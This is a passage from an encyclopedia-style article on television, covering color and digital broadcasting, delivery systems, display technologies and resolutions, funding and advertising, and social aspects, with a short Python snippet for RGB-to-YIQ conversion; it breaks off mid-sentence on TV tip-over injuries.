most network broadcasts and nearly all local programming continued to be black-and-white. It was not until the mid-1960s that color sets started selling in large numbers, due in part to the color transition of 1965, in which it was announced that over half of all network prime-time programming would be broadcast in color that fall. The first all-color prime-time season came just one year later. 
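The luminance/chrominance separation behind the compatible-color scheme described above can be illustrated numerically. The sketch below uses the standard NTSC YIQ conversion coefficients; the function name and the example pixel are illustrative, not drawn from this article.

```python
def rgb_to_yiq(r, g, b):
    """Convert normalized RGB (0..1) to NTSC YIQ (standard coefficients).

    Y is the luminance a black-and-white set displays; I and Q carry
    the color information, which NTSC transmitted at reduced bandwidth.
    """
    y = 0.299 * r + 0.587 * g + 0.114 * b
    i = 0.596 * r - 0.274 * g - 0.322 * b
    q = 0.211 * r - 0.523 * g + 0.312 * b
    return y, i, q

# A saturated green pixel: a monochrome receiver shows only Y (~0.59),
# while a color receiver also decodes I and Q to recover the hue.
print(rgb_to_yiq(0.0, 1.0, 0.0))
```

Because a legacy set simply ignores the narrowband I and Q components and displays Y alone, the same broadcast serves both black-and-white and color receivers, which is exactly the compatibility the NTSC committee was after.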
In 1972, the last holdout among daytime network programs converted to color, resulting in the first completely all-color network season. Early color sets were either floor-standing console models or tabletop versions nearly as bulky and heavy, so in practice they remained firmly anchored in one place. GE's relatively compact and lightweight Porta-Color set was introduced in the spring of 1966. It used a transistor-based UHF tuner. The first fully transistorized color television in the United States was the Quasar television introduced in 1967. These developments made watching color television a more flexible and convenient proposition. In 1972, sales of color sets finally surpassed sales of black-and-white sets. Color broadcasting in Europe was not standardized on the PAL format until the 1960s, and broadcasts did not start until 1967. By this point, many of the technical issues in the early sets had been worked out, and the spread of color sets in Europe was fairly rapid. By the mid-1970s, the only stations broadcasting in black-and-white were a few high-numbered UHF stations in small markets and a handful of low-power repeater stations in even smaller markets such as vacation spots. By 1979, even the last of these had converted to color. By the early 1980s, B&W sets had been pushed into niche markets, notably low-power uses, small portable sets, or for use as video monitor screens in lower-cost consumer equipment. By the late 1980s, even these last holdout niche B&W environments had inevitably shifted to color sets. Digital Digital television (DTV) is the transmission of audio and video by digitally processed and multiplexed signals, in contrast to the analog and channel-separated signals used by analog television. Due to data compression, digital television can support more than one program in the same channel bandwidth. It is an innovative service that represents the most significant evolution in television broadcast technology since color television emerged in the 1950s. Digital television's roots have been tied very closely to the availability of inexpensive, high-performance computers. It was not until the 1990s that digital television became possible. Digital television was not previously practical due to the high bandwidth requirements of uncompressed digital video, requiring around 200 Mbit/s for a standard-definition television (SDTV) signal and over 1 Gbit/s for high-definition television (HDTV). A digital television service was proposed in 1986 by Nippon Telegraph and Telephone (NTT) and the Ministry of Posts and Telecommunication (MPT) in Japan, where there were plans to develop an "Integrated Network System" service. However, it was not possible to implement such a digital television service practically until the adoption of DCT video compression technology made it possible in the early 1990s. In the mid-1980s, as Japanese consumer electronics firms forged ahead with the development of HDTV technology, the MUSE analog format proposed by NHK, a Japanese company, was seen as a pacesetter that threatened to eclipse U.S. electronics companies' technologies. Until June 1990, the Japanese MUSE standard, based on an analog system, was the front-runner among the more than 23 other technical concepts under consideration. Then, a U.S. company, General Instrument, demonstrated the possibility of a digital television signal. 
This breakthrough was of such significance that the FCC was persuaded to delay its decision on an ATV standard until a digitally-based standard could be developed. In March 1990, when it became clear that a digital standard was possible, the FCC made several critical decisions. First, the Commission declared that the new ATV standard must be more than an enhanced analog signal but be able to provide a genuine HDTV signal with at least twice the resolution of existing television images. Then, to ensure that viewers who did not wish to buy a new digital television set could continue to receive conventional television broadcasts, it dictated that the new ATV standard must be capable of being "simulcast" on different channels. The new ATV standard also allowed the new DTV signal to be based on entirely new design principles. Although incompatible with the existing NTSC standard, the new DTV standard would be able to incorporate many improvements. The final standards adopted by the FCC did not require a single standard for scanning formats, aspect ratios, or lines of resolution. This compromise resulted from a dispute between the consumer electronics industry (joined by some broadcasters) and the computer industry (joined by the film industry and some public interest groups) over which of the two scanning processes—interlaced or progressive—would be best suited for the newer digital HDTV compatible display devices. Interlaced scanning, which had been specifically designed for older analog CRT display technologies, scans even-numbered lines first, then odd-numbered ones. Interlaced scanning can be regarded as the first video compression model. It was partly developed in the 1940s to double the image resolution to exceed the limitations of television broadcast bandwidth. Another reason for its adoption was to limit the flickering on early CRT screens, whose phosphor-coated screens could only retain the image from the electron scanning gun for a relatively short duration. However, interlaced scanning does not work as efficiently on newer display devices such as liquid-crystal displays (LCDs), which are better suited to a more frequent progressive refresh rate. Progressive scanning, the format that the computer industry had long adopted for computer display monitors, scans every line in sequence, from top to bottom. Progressive scanning, in effect, doubles the amount of data generated for every full screen displayed in comparison to interlaced scanning by painting the screen in one pass in 1/60-second instead of two passes in 1/30-second. The computer industry argued that progressive scanning is superior because it does not "flicker" on the new standard of display devices in the manner of interlaced scanning. It also argued that progressive scanning enables easier connections with the Internet and is more cheaply converted to interlaced formats than vice versa. The film industry also supported progressive scanning because it offered a more efficient means of converting filmed programming into digital formats. For their part, the consumer electronics industry and broadcasters argued that interlaced scanning was the only technology that could transmit the highest quality pictures then (and currently) feasible, i.e., 1,080 lines per picture and 1,920 pixels per line. Broadcasters also favored interlaced scanning because their vast archive of interlaced programming is not readily compatible with a progressive format. William F. 
Schreiber, who was director of the Advanced Television Research Program at the Massachusetts Institute of Technology from 1983 until his retirement in 1990, thought that the continued advocacy of interlaced equipment originated from consumer electronics companies that were trying to get back the substantial investments they made in the interlaced technology. The digital television transition started in the late 2000s. Governments across the world set deadlines for the shutdown of analog broadcasts in the 2010s. Initially, the adoption rate was low, as the first digital tuner-equipped television sets were costly. However, as the price of digital-capable television sets dropped, more and more households started converting to digital television sets. The transition was expected to be completed worldwide by the mid-to-late 2010s. Smart television The advent of digital television allowed innovations like smart television sets. A smart television, sometimes referred to as a "connected TV" or "hybrid TV," is a television set or set-top box with integrated Internet and Web 2.0 features and is an example of technological convergence between computers, television sets, and set-top boxes. Besides the traditional functions of television sets and set-top boxes provided through traditional broadcasting media, these devices can also provide Internet TV, online interactive media, over-the-top content, as well as on-demand streaming media, and home networking access. These TVs come pre-loaded with an operating system. Smart TV is not to be confused with Internet TV, Internet Protocol television (IPTV), or Web TV. Internet television refers to receiving television content over the Internet instead of through traditional systems—terrestrial, cable, and satellite. IPTV is one of the emerging Internet television technology standards for television networks. Web television (WebTV) is a term used for programs created by a wide variety of companies and individuals for broadcast on Internet TV. A first patent was filed in 1994 (and extended the following year) for an "intelligent" television system, linked with data processing systems, using a digital or analog network. Apart from being linked to data networks, one key feature is its ability to automatically download necessary software routines according to a user's demand and process their needs. In 2015, major TV manufacturers announced the production of smart TVs only for their middle-end and high-end models. Smart TVs have become more affordable compared to when they were first introduced, with 46 million U.S. households having at least one as of 2019. 3D 3D television conveys depth perception to the viewer by employing techniques such as stereoscopic display, multi-view display, 2D-plus-depth, or any other form of 3D display. Most modern 3D television sets use an active shutter 3D system or a polarized 3D system, and some are autostereoscopic without the need for glasses. Stereoscopic 3D television was demonstrated for the first time on 10 August 1928, by John Logie Baird in his company's premises at 133 Long Acre, London. Baird pioneered a variety of 3D television systems using electromechanical and cathode-ray tube techniques. The first 3D television was produced in 1935. The advent of digital television in the 2000s greatly improved 3D television sets. Although 3D television sets are quite popular for watching 3D home media, such as on Blu-ray discs, 3D programming has largely failed to make inroads with the public. 
As a result, many 3D television channels that started in the early 2010s were shut down by the mid-2010s. According to DisplaySearch, 3D television shipments totaled 41.45 million units in 2012, compared with 24.14 million in 2011 and 2.26 million in 2010. By late 2013, the number of 3D TV viewers had started to decline. Broadcast systems Terrestrial television Programming is broadcast by television stations, sometimes called "channels," as stations are licensed by their governments to broadcast only over assigned channels in the television band. At first, terrestrial broadcasting was the only way television could be widely distributed, and because bandwidth was limited, i.e., there were only a small number of channels available, government regulation was the norm. In the U.S., the Federal Communications Commission (FCC) allowed stations to broadcast advertisements beginning in July 1941 but required public service programming commitments as a requirement for a license. By contrast, the United Kingdom chose a different route, imposing a television license fee on owners of television reception equipment to fund the British Broadcasting Corporation (BBC), which had public service as part of its Royal Charter. WRGB claims to be the world's oldest television station, tracing its roots to an experimental station founded on 13 January 1928, broadcasting from the General Electric factory in Schenectady, NY, under the call letters W2XB. It was popularly known as "WGY Television" after its sister radio station. Later, in 1928, General Electric started a second facility, this one in New York City, which had the call letters W2XBS and which today is known as WNBC. The two stations were experimental and had no regular programming, as receivers were operated by engineers within the company. The image of a Felix the Cat doll rotating on a turntable was broadcast for 2 hours every day for several years as engineers tested new technology. On 2 November 1936, the BBC began transmitting the world's first public regular high-definition service from the Victorian Alexandra Palace in north London. It therefore claims to be the birthplace of television broadcasting as we now know it. With the widespread adoption of cable across the United States in the 1970s and 1980s, terrestrial television broadcasts have been in decline; in 2013, it was estimated that about 7% of US households used an antenna. A slight increase in use began around 2010 due to the switchover to digital terrestrial television broadcasts, which offered pristine image quality over very large areas, and offered an alternative to cable television (CATV) for cord cutters. All other countries around the world are also in the process of either shutting down analog terrestrial television or switching over to digital terrestrial television. Cable television Cable television is a system of broadcasting television programming to paying subscribers via radio frequency (RF) signals transmitted through coaxial cables or light pulses through fiber-optic cables. This contrasts with traditional terrestrial television, in which the television signal is transmitted over the air by radio waves and received by a television antenna attached to the television. Since the 2000s, FM radio programming, high-speed Internet, telephone service, and similar non-television services have also been provided through these cables. The abbreviation CATV is sometimes used for cable television in the United States. 
It originally stood for Community Access Television or Community Antenna Television, from cable television's origins in 1948: in areas where over-the-air reception was limited by distance from transmitters or mountainous terrain, large "community antennas" were constructed, and cable was run from them to individual homes. Satellite television Satellite television is a system of supplying television programming using broadcast signals relayed from communication satellites. The signals are received via an outdoor parabolic reflector antenna, usually referred to as a satellite dish, and a low-noise block downconverter (LNB). A satellite receiver then decodes the desired television program for viewing on a television set. Receivers can be external set-top boxes or built-in television tuners. Satellite television provides a wide range of channels and services, especially to geographic areas without terrestrial television or cable television. The most common method of reception is direct-broadcast satellite television (DBSTV), also known as "direct to home" (DTH). In DBSTV systems, signals are relayed from a direct broadcast satellite in the Ku band and are completely digital. Satellite TV systems formerly used systems known as television receive-only. These systems received analog signals transmitted in the C-band spectrum from FSS-type satellites and required the use of large dishes. Consequently, these systems were nicknamed "big dish" systems and were more expensive and less popular. Direct-broadcast satellite television signals were initially analog and later digital, both of which require a compatible receiver. Digital signals may include high-definition television (HDTV). Some transmissions and channels are free-to-air or free-to-view, while many other channels are pay television requiring a subscription. In 1945, British science fiction writer Arthur C. Clarke proposed a worldwide communications system that would function by means of three satellites equally spaced in Earth orbit. This was published in the October 1945 issue of the Wireless World magazine and won him the Franklin Institute's Stuart Ballantine Medal in 1963. The first satellite television signals from Europe to North America were relayed via the Telstar satellite over the Atlantic Ocean on 23 July 1962. The signals were received and broadcast in North American and European countries and watched by over 100 million people. Launched in 1962, the Relay 1 satellite was the first satellite to transmit television signals from the US to Japan. The first geosynchronous communication satellite, Syncom 2, was launched on 26 July 1963. The world's first commercial communications satellite, called Intelsat I and nicknamed "Early Bird", was launched into geosynchronous orbit on 6 April 1965. The first national network of television satellites, called Orbita, was created by the Soviet Union in October 1967, and was based on the principle of using the highly elliptical Molniya satellites for rebroadcasting and delivering television signals to ground downlink stations. The first commercial North American satellite to carry television transmissions was Canada's geostationary Anik 1, which was launched on 9 November 1972. ATS-6, the world's first experimental educational and Direct Broadcast Satellite (DBS), was launched on 30 May 1974. It transmitted at 860 MHz using wideband FM modulation and had two sound channels. 
The transmissions were focused on the Indian subcontinent, but experimenters were able to receive the signal in Western Europe using home-constructed equipment that drew on UHF television design techniques already in use. The first in a series of Soviet geostationary satellites to carry Direct-To-Home television, Ekran 1, was launched on 26 October 1976. It used a 714 MHz UHF downlink frequency so that the transmissions could be received with existing UHF television technology rather than microwave technology. Internet television Internet television (Internet TV, or online television) is the digital distribution of television content via the Internet, as opposed to traditional systems like terrestrial, cable, and satellite, although the Internet itself is received by terrestrial, cable, or satellite methods. Internet television is a general term that covers the delivery of television series and other video content over the Internet by video streaming technology, typically by major traditional television broadcasters. Internet television should not be confused with Smart TV, IPTV, or Web TV. Smart television refers to a television set with a built-in operating system. Internet Protocol television (IPTV) is one of the emerging Internet television technology standards for use by television networks. Web television is a term used for programs created by a wide variety of companies and individuals for broadcast on Internet television. Traditional cable and satellite television providers began to offer streaming services; Sling TV, owned by Dish Network, was unveiled in January 2015. DirecTV, another satellite television provider, launched its own streaming service, DirecTV Stream, in 2016. Sky launched a similar streaming service in the UK called Now. In 2013, the video-on-demand website Netflix earned the first Primetime Emmy Award nominations for original streaming television at the 65th Primetime Emmy Awards. Three of its series, House of Cards, Arrested Development, and Hemlock Grove, earned nominations that year. On July 13, 2015, cable company Comcast announced a package combining HBO with broadcast TV at a price discounted from that of basic broadband plus basic cable. In 2017, YouTube launched YouTube TV, a streaming service that allows users to watch live television programs from popular cable or network channels and record shows to stream anywhere, anytime. As of 2017, 28% of US adults cited streaming services as their main means for watching television, and 61% of those ages 18 to 29 cited it as their main method. As of 2018, Netflix was the world's largest streaming TV network and also the world's largest Internet media and entertainment company by paid subscribers (117 million), revenue, and market capitalization. In 2020, the COVID-19 pandemic had a strong impact on the television streaming business, as lifestyle changes such as lockdowns kept more people at home. Sets A television set, also called a television receiver, television, TV set, TV, or "telly," is a device that combines a tuner, display, amplifier, and speakers for the purpose of viewing television and hearing its audio components. Introduced in the late 1920s in mechanical form, television sets became a popular consumer product after World War II in electronic form, using cathode-ray tubes. The addition of color to broadcast television after 1953 further increased the popularity of television sets, and an outdoor antenna became a common feature of suburban homes. 
The ubiquitous television set became the display device for recorded media in the 1970s, such as Betamax and VHS, which enabled viewers to record TV shows and watch prerecorded movies. In the subsequent decades, television sets were used to watch DVDs and Blu-ray Discs of movies and other content. Major TV manufacturers announced the discontinuation of CRT, DLP, plasma, and fluorescent-backlit LCDs by the mid-2010s. Since the 2010s, televisions have mostly used LED-backlit LCDs, which are in turn expected to be gradually replaced by OLED displays in the near future. Display technologies Disk The earliest systems employed a spinning disk to create and reproduce images. These usually had a low resolution and screen size and never became popular with the public. CRT The cathode-ray tube (CRT) is a vacuum tube containing one or more electron guns (a source of electrons or electron emitter) and a fluorescent screen used to view images. It has the means to accelerate and deflect the electron beam(s) onto the screen to create the images. The images may represent electrical waveforms (oscilloscope), pictures (television, computer monitor), radar targets, or other phenomena. The CRT uses an evacuated glass envelope that is large, deep (i.e., long from front screen face to rear end), fairly heavy, and relatively fragile. As a matter of safety, the face is typically made of thick lead glass so as to be highly shatter-resistant and to block most X-ray emissions, particularly if the CRT is used in a consumer product. In television sets and computer monitors, the entire front area of the tube is scanned repetitively and systematically in a fixed pattern called a raster. An image is produced by controlling the intensity of each of the three electron beams, one for each additive primary color (red, green, and blue), with a video signal as a reference. In all modern CRT monitors and televisions, the beams are bent by magnetic deflection, a varying magnetic field generated by coils and driven by electronic circuits around the neck of the tube, although electrostatic deflection is commonly used in oscilloscopes, a type of diagnostic instrument. DLP Digital Light Processing (DLP) is a type of video projector technology that uses a digital micromirror device. Some DLPs have a TV tuner, which makes them a type of TV display. It was originally developed in 1987 by Dr. Larry Hornbeck of Texas Instruments. While the DLP imaging device was invented by Texas Instruments, the first DLP-based projector was introduced by Digital Projection Ltd in 1997. Digital Projection and Texas Instruments were both awarded Emmy Awards in 1998 for the invention of the DLP projector technology. DLP is used in a variety of display applications, from traditional static displays to interactive displays and also non-traditional embedded applications, including medical, security, and industrial uses. DLP technology is used in DLP front projectors (standalone projection units, primarily for classrooms and businesses) but also in private homes; in these cases, the image is projected onto a projection screen. DLP is also used in DLP rear-projection television sets and digital signs. It is also used in about 85% of digital cinema projection. Plasma A plasma display panel (PDP) is a type of flat-panel display common to large television displays. They are called "plasma" displays because the technology uses small cells containing electrically charged ionized gases, which are in essence chambers more commonly known as fluorescent lamps. 
LCD Liquid-crystal-display televisions (LCD TVs) are television sets that use liquid-crystal display technology to produce images. LCD televisions are much thinner and lighter than cathode-ray tube (CRT) sets of similar display size and are available in much larger sizes (e.g., 90-inch diagonal). When manufacturing costs fell, this combination of features made LCDs practical for television receivers. LCDs come in two types: those backlit by cold-cathode fluorescent lamps, simply called LCDs, and those backlit by LEDs, commonly marketed as LED TVs. In 2007, LCD television sets surpassed sales of CRT-based television sets worldwide for the first time, and their sales figures relative to other technologies accelerated. LCD television sets quickly displaced their only major competitors in the large-screen market, the plasma display panel and rear-projection television. By the mid-2010s, LCDs, especially LED-backlit models, had become by far the most widely produced and sold type of television display. LCDs also have disadvantages; other technologies address these weaknesses, including OLEDs, FED, and SED, but none of these have entered widespread production. OLED An OLED (organic light-emitting diode) is a light-emitting diode (LED) in which the emissive electroluminescent layer is a film of organic compound that emits light in response to an electric current. This layer of organic semiconductor is situated between two electrodes. Generally, at least one of these electrodes is transparent. OLEDs are used to create digital displays in devices such as television screens. They are also used in computer monitors and portable systems such as mobile phones, handheld game consoles, and PDAs. There are two main groups of OLED: those based on small molecules and those employing polymers. Adding mobile ions to an OLED creates a light-emitting electrochemical cell, or LEC, which has a slightly different mode of operation. OLED displays can use either passive-matrix (PMOLED) or active-matrix (AMOLED) addressing schemes. Active-matrix OLEDs require a thin-film transistor backplane to switch each individual pixel on or off but allow for higher resolution and larger display sizes. An OLED display works without a backlight. Thus, it can display deep black levels and can be thinner and lighter than a liquid crystal display (LCD). In low ambient light conditions such as a dark room, an OLED screen can achieve a higher contrast ratio than an LCD, whether the LCD uses cold cathode fluorescent lamps or an LED backlight. OLEDs are expected to replace other forms of display in the near future. Display resolution LD Low-definition television or LDTV refers to television systems that have a lower screen resolution than standard-definition television systems, such as 240p (320×240). It is used in handheld televisions. The most common source of LDTV programming is the Internet, where mass distribution of higher-resolution video files could overwhelm computer servers and take too long to download. Many mobile phones and portable devices such as Apple's iPod Nano or Sony's PlayStation Portable use LDTV video, as higher-resolution files would be excessive to the needs of their small screens (320×240 and 480×272 pixels, respectively). The current generation of iPod Nanos has LDTV screens, as do the first three generations of iPod Touch and iPhone (480×320). For the first years of its existence, YouTube offered only one low-definition resolution of 320×240 at 30 frames per second or less. 
A standard, consumer-grade videotape can be considered SDTV due to its resolution (approximately 360 × 480i/576i). SD Standard-definition television or SDTV refers to two different resolutions: 576i, with 576 interlaced lines of resolution, derived from the European-developed PAL and SECAM systems, and 480i based on the American National Television System Committee (NTSC) system. SDTV is a television system that uses a resolution that is not considered to be either high-definition television (720p, 1080i, 1080p, 1440p, 4K UHDTV, and 8K UHD) or enhanced-definition television (EDTV 480p). In North America, digital SDTV is broadcast in the same 4:3 aspect ratio as NTSC signals, with widescreen content being center cut. However, in other parts of the world that used the PAL or SECAM color systems, standard-definition television is now usually shown with a 16:9 aspect ratio, with the transition occurring between the mid-1990s and mid-2000s. Older programs with a 4:3 aspect ratio are shown in the United States as 4:3, with non-ATSC countries preferring to reduce the horizontal resolution by anamorphically scaling a pillarboxed image. HD High-definition television (HDTV) provides a resolution that is substantially higher than that of standard-definition television. HDTV may be transmitted in various formats:
1080p (1920×1080 progressive): 2,073,600 pixels (~2.07 megapixels) per frame
1080i (1920×1080 interlaced): 1,036,800 pixels (~1.04 MP) per field or 2,073,600 pixels (~2.07 MP) per frame; a non-standard CEA resolution also exists in some countries, 1440×1080i: 777,600 pixels (~0.78 MP) per field or 1,555,200 pixels (~1.56 MP) per frame
720p (1280×720 progressive): 921,600 pixels (~0.92 MP) per frame
UHD Ultra-high-definition television (also known as Super Hi-Vision, Ultra HD television, UltraHD, UHDTV, or UHD) includes 4K UHD (2160p) and 8K UHD (4320p), which are two digital video formats proposed by NHK Science & Technology Research Laboratories and defined and approved by the International Telecommunication Union (ITU). The Consumer Electronics Association announced on 17 October 2012 that "Ultra High Definition," or "Ultra HD," would be used for displays that have an aspect ratio of at least 16:9 and at least one digital input capable of carrying and presenting natural video at a minimum resolution of 3840×2160 pixels. Market share North American consumers purchase a new television set on average every seven years, and the average household owns 2.8 televisions. About 48 million sets are sold each year at an average price of $460. Content Programming Getting TV programming shown to the public can happen in many different ways. After production, the next step is to market and deliver the product to whichever markets are open to using it. This typically happens on two levels:
Original run or First run: a producer creates a program of one or multiple episodes and shows it on a station or network that has either paid for the production itself or been granted a license by the television producers to show it.
Broadcast syndication: this is the terminology rather broadly used to describe secondary programming usages (beyond the original run). It includes secondary runs in the country of the first issue, but also international usage, which may not be managed by the originating producer. 
In many cases, other companies, television stations, or individuals are engaged to do the syndication work, in other words, to sell the product into the markets they are allowed to sell into by contract with the copyright holders, in most cases the producers. First-run programming is increasing on subscription services outside the United States, but few domestically produced programs are syndicated on domestic free-to-air (FTA) networks elsewhere. This practice is increasing, however, generally on digital-only FTA channels or with subscriber-only, first-run material appearing on FTA. Unlike the United States, repeat FTA screenings of an FTA network program usually occur only on that network. Also, affiliates rarely buy or produce non-network programming that is not focused on local content. Genres Television genres include a broad range of programming types that entertain, inform, and educate viewers. The most expensive entertainment genres to produce are usually dramas and dramatic miniseries. However, other genres, such as historical Westerns, may also have high production costs. Pop culture entertainment genres include action-oriented shows such as police, crime, detective dramas, horror, or thriller shows. There are also other variants of the drama genre, such as medical dramas and daytime soap operas. Sci-fi series can fall into either the drama or action category, depending on whether they emphasize philosophical questions or high adventure. Comedy is a popular genre that includes situation comedy (sitcom) and animated series for the adult demographic, such as Comedy Central's South Park. The least expensive forms of entertainment programming genres are game shows, talk shows, variety shows, and reality television. Game shows feature contestants answering questions and solving puzzles to win prizes. Talk shows contain interviews with film, television, music, and sports celebrities and public figures. Variety shows feature a range of musical performers and other entertainers, such as comedians and magicians, introduced by a host or Master of Ceremonies. There is some crossover between some talk shows and variety shows because leading talk shows often feature performances by bands, singers, comedians, and other performers in between the interview segments. Reality television series feature "regular" people (i.e., not actors) facing unusual challenges or experiences, ranging from arrest by police officers (COPS) to significant weight loss (The Biggest Loser). A derived version of reality shows depicts celebrities doing mundane activities such as going about their everyday life (The Osbournes, Snoop Dogg's Father Hood) or doing regular jobs (The Simple Life). Fictional television programs that some television scholars and broadcasting advocacy groups argue are "quality television" include series such as Twin Peaks and The Sopranos. Kristin Thompson argues that some of these television series exhibit traits also found in art films, such as psychological realism, narrative complexity, and ambiguous plotlines. Nonfiction television programs that some television scholars and broadcasting advocacy groups argue are "quality television" include a range of serious, noncommercial programming aimed at a niche audience, such as documentaries and public affairs shows. Funding Around the world, broadcast television is financed by government, advertising, licensing (a form of tax), subscription, or any combination of these. 
To protect revenues, subscription television channels are usually encrypted to ensure that only subscribers receive the decryption codes to see the signal. Unencrypted channels are known as free-to-air or FTA. In 2009, the global TV market represented 1,217.2 million TV households with at least one TV and total revenues of 268.9 billion EUR (declining 1.2% compared to 2008). North America had the biggest TV revenue market share with 39%, followed by Europe (31%), Asia-Pacific (21%), Latin America (8%), and Africa and the Middle East (2%). Globally, the different TV revenue sources are divided into 45–50% TV advertising revenues, 40–45% subscription fees, and 10% public funding. Advertising Television's broad reach makes it a powerful and attractive medium for advertisers. Many television networks and stations sell blocks of broadcast time to advertisers ("sponsors") to fund their programming. A television advertisement (variously called a television commercial, commercial, or ad in American English, and known in British English as an advert) is a span of television programming produced and paid for by an organization, which conveys a message, typically to market a product or service. Advertising revenue provides a significant portion of the funding for most privately owned television networks. The vast majority of television advertisements today consist of brief advertising spots, ranging in length from a few seconds to several minutes (as well as program-length infomercials). Advertisements of this sort have been used to promote a wide variety of goods, services, and ideas since the beginning of television. The effects of television advertising upon the viewing public (and the effects of mass media in general) have been the subject of discourse by philosophers, including Marshall McLuhan. The viewership of television programming, as measured by companies such as Nielsen Media Research, is often used as a metric for television advertisement placement and, consequently, for the rates charged to advertisers to air within a given network, television program, or time of day (called a "daypart"). In many countries, including the United States, television campaign advertisements are considered indispensable for a political campaign. In other countries, such as France, political advertising on television is heavily restricted, while some countries, such as Norway, completely ban political advertisements. The first official, paid television advertisement was broadcast in the United States on 1 July 1941, over New York station WNBT (now WNBC) before a baseball game between the Brooklyn Dodgers and Philadelphia Phillies. The announcement for Bulova watches, for which the company paid anywhere from $4.00 to $9.00 (reports vary), displayed a WNBT test pattern modified to look like a clock with the hands showing the time. The Bulova logo, with the phrase "Bulova Watch Time," was shown in the lower right-hand quadrant of the test pattern while the second hand swept around the dial for one minute. The first TV ad broadcast in the U.K. was on ITV on 22 September 1955, advertising Gibbs SR toothpaste. The first TV ad broadcast in Asia was on Nippon Television in Tokyo on 28 August 1953, advertising Seikosha (now Seiko), which also displayed a clock with the current time. United States Since their inception in the US in 1941, television commercials have become one of the most effective, persuasive, and popular methods of selling products of many sorts, especially consumer goods. 
During the 1940s and into the 1950s, programs were hosted by single advertisers. This, in turn, gave great creative control to the advertisers over the content of the show. Perhaps due to the quiz show scandals in the 1950s, networks shifted to the magazine concept, introducing advertising breaks shared among multiple advertisers. U.S. advertising rates are determined primarily by Nielsen ratings. The time of day and the popularity of the channel determine how much a TV commercial can cost. For example, it can cost approximately $750,000 for a 30-second block of commercial time during the highly popular singing competition American Idol, while the same amount of time for the Super Bowl can cost several million dollars. Conversely, lesser-viewed time slots, such as early mornings and weekday afternoons, are often sold in bulk to producers of infomercials at far lower rates. In recent years, paid programs or infomercials have become common, usually in lengths of 30 minutes or one hour. Some drug companies and other businesses have even created "news" items for broadcast, known in the industry as video news releases, paying program directors to use them. Some television programs also deliberately place products into their shows as advertisements, a practice started in feature films and known as product placement. For example, a character could be drinking a certain kind of soda, going to a particular chain restaurant, or driving a certain make of car. (This is sometimes very subtle, with shows having vehicles provided by manufacturers at low cost in exchange for product placement.) Sometimes, a specific brand or trademark, or music from a certain artist or group, is used. (This excludes guest appearances by artists who perform on the show.) United Kingdom The TV regulator oversees TV advertising in the United Kingdom. Its restrictions have applied since the early days of commercially funded TV. Despite this, an early TV mogul, Roy Thomson, likened the broadcasting license to a "license to print money". Restrictions mean that the big three national commercial TV channels (ITV, Channel 4, and Channel 5) can show an average of only seven minutes of advertising per hour (eight minutes in the peak period). Other broadcasters must average no more than nine minutes (twelve in the peak). This means that many imported TV shows from the U.S. have unnatural pauses where the British company does not use the narrative breaks intended for more frequent U.S. advertising. Advertisements must not be inserted in the course of certain specific proscribed types of programs that last less than half an hour in scheduled duration; this list includes any news or current affairs programs, documentaries, and programs for children; additionally, advertisements may not be carried in a program designed and broadcast for reception in schools, in any religious broadcasting service or other devotional program, or during a formal Royal ceremony or occasion. There also must be clear demarcations in time between the programs and the advertisements. The BBC, being strictly non-commercial, is not allowed to show adverts on television in the U.K., though it has advertising-funded channels abroad. The majority of its budget comes from television license fees (see below) and broadcast syndication, the sale of content to other broadcasters. Ireland Broadcast advertising is regulated by the Broadcasting Authority of Ireland. 
Subscription Some TV channels are partly funded from subscriptions; therefore, the signals are encrypted during the broadcast to ensure that only the paying subscribers have access to the decryption codes to watch pay television or specialty channels. Most subscription services are also funded by advertising. Taxation or license Television services in some countries may be funded by a television licence or a form of taxation, which means that advertising plays a lesser role or no role at all. For example, some channels may carry no advertising at all and some very little, including:
Australia (ABC Television)
Belgium (VRT for Flanders and RTBF for Wallonia)
Denmark (DR)
Ireland (RTÉ)
Japan (NHK)
Norway (NRK)
Sweden (SVT)
Switzerland (SRG SSR)
Republic of China (Taiwan) (PTS)
United Kingdom (BBC Television)
United States (PBS)
The British Broadcasting Corporation's TV service carries no television advertising on its UK channels and is funded by an annual television license paid by the occupiers of premises receiving live telecasts. It was estimated that approximately 26.8 million UK private domestic households owned televisions, with approximately 25 million TV licences in force across all premises as of 2010. This television license fee is set by the government, but the BBC is not answerable to or controlled by the government. The two main BBC TV channels were watched by almost 90% of the population each week and overall had a 27% share of total viewing, despite the fact that 85% of homes were multi-channel, with 42% of these having access to 200 free-to-air channels via satellite and another 43% having access to 30 or more channels via Freeview. The licence that funds the advertising-free BBC TV channels costs £159 for a colour TV licence and £53.50 for a black and white TV licence (free or reduced for some groups). The Australian Broadcasting Corporation's television services in Australia carry no advertising by external sources; it is banned under the Australian Broadcasting Corporation Act 1983, which also ensures its editorial independence. The ABC receives most of its funding from the Australian Government (some revenue is received from its commercial division), but it has suffered progressive funding cuts under Liberal governments since the 1996 Howard government, with particularly deep cuts in 2014 under the Abbott government, and an ongoing indexation freeze. The funds provide for the ABC's television, radio, online, and international outputs, although ABC Australia, which broadcasts throughout the Asia-Pacific region, receives additional funds through DFAT and some advertising on the channel. In France, government-funded channels carry advertisements, yet those who own television sets have to pay an annual tax ("la redevance audiovisuelle"). In Japan, NHK is paid for by license fees. The broadcast law that governs NHK's funding stipulates that any television equipped to receive NHK is required to pay. The fee is standardized, with discounts for office workers and students who commute, as well as a general discount for residents of Okinawa prefecture. Broadcast programming Broadcast programming, or TV listings in the United Kingdom, is the practice of organizing television programs in a schedule, with broadcast automation used to regularly change the scheduling of TV programs to build an audience for a new show, retain that audience, or compete with other broadcasters' programs. 
Social aspects Television has played a pivotal role in the socialization of the 20th and 21st centuries. There are many aspects of television that can be addressed, including negative issues such as media violence. Current research is discovering that individuals suffering from social isolation can employ television to create what is termed a parasocial or faux relationship with characters from their favorite television shows and movies as a way of deflecting feelings of loneliness and social deprivation. Several studies have found that educational television has many advantages. The article "The Good Things about Television" argues that television can be a very powerful and effective learning tool for children if used wisely. With respect to faith, many Christian denominations use television for religious broadcasting. Religious opposition Methodist denominations in the conservative holiness movement, such as the Allegheny Wesleyan Methodist Connection and the Evangelical Wesleyan Church, eschew the use of television. Some Baptists, such as those affiliated with Pensacola Christian College, also eschew television. Many Traditional Catholic congregations, such as the Society of Saint Pius X (SSPX), as well as Laestadian Lutherans and Conservative Anabaptists such as the Dunkard Brethren Church, oppose the presence of television in the household, teaching that it is an occasion of sin. Negative impacts Children, especially those aged five or younger, are at risk of injury from falling televisions. A CRT-style television that falls on a child will, because of its weight, hit with a force equivalent to that of a fall from several stories of a building. Newer flat-screen televisions are "top-heavy and have narrow bases," which means that a small child can easily pull one over. TV tip-overs have been responsible for more than 10,000 injuries 